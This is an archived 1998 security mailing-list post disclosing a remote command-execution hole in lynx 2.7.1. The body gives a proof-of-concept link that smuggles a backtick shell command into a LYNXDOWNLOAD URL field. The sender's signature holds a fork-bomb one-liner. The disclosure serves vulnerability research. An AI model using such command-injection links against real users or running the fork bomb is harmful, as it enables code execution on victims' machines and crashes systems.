Very, very ugly remote lynx 2.7.1 hole

From: Michal Zalewski (lcamtufat_private)
Date: Tue Mar 17 1998 - 07:27:29 PST

Next message: Michal Zalewski: "Another day, another race - lynx 2.7.1"

Previous message: Russ: "Re: More broadcast fun"
Next in thread: Lumpy Lynx: "Re: Very, very ugly remote lynx 2.7.1 hole"
Reply: Lumpy Lynx: "Re: Very, very ugly remote lynx 2.7.1 hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

While poking around lynx protocol handling routines, I found this very
big, ugly remote hole:

<a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test">
CLICK HERE
</a>

It allows remote execution of any code on viewer's machine. Also, by
setting 'Method' field to 0 or more, you may crash lynx, but it isn't so
exciting as above URL. Also, it's possible to parse /dev/zero as 'File',
also not funny.

Greetings,
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=

Next message: Michal Zalewski: "Another day, another race - lynx 2.7.1"
Previous message: Russ: "Re: More broadcast fun"
Next in thread: Lumpy Lynx: "Re: Very, very ugly remote lynx 2.7.1 hole"
Reply: Lumpy Lynx: "Re: Very, very ugly remote lynx 2.7.1 hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:45:47 PDT